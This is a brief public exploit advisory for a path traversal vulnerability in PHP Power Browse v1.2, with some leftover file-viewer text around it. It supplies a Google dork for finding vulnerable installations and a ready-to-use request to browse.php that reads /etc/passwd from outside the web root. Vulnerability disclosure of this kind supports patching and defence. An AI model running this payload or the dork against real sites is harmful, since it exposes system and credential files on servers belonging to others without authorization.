19 lines
No EOL
589 B
Text
19 lines
No EOL
589 B
Text
# Exploit Title: PHP Power Browse v1.2 - Path Traversal
|
|
# Google Dork:
|
|
intitle:PHP Power Browse inurl:browse.php
|
|
# Exploit Author: Manuel Mancera (sinkmanu) | sinkmanu (at) gmail
|
|
(dot) com
|
|
# Software URL: https://github.com/arzynik/PHPPowerBrowse
|
|
# Version: 1.2
|
|
# Vulnerability Type : Path traversal
|
|
# Severity : High
|
|
|
|
### Description ###
|
|
|
|
This file browser is vulnerable to path traversal and allow to an
|
|
attacker to access to files and directories that are stored outside the
|
|
web root folder.
|
|
|
|
### Exploit ###
|
|
|
|
http://site/browse.php?p=source&file=/etc/passwd |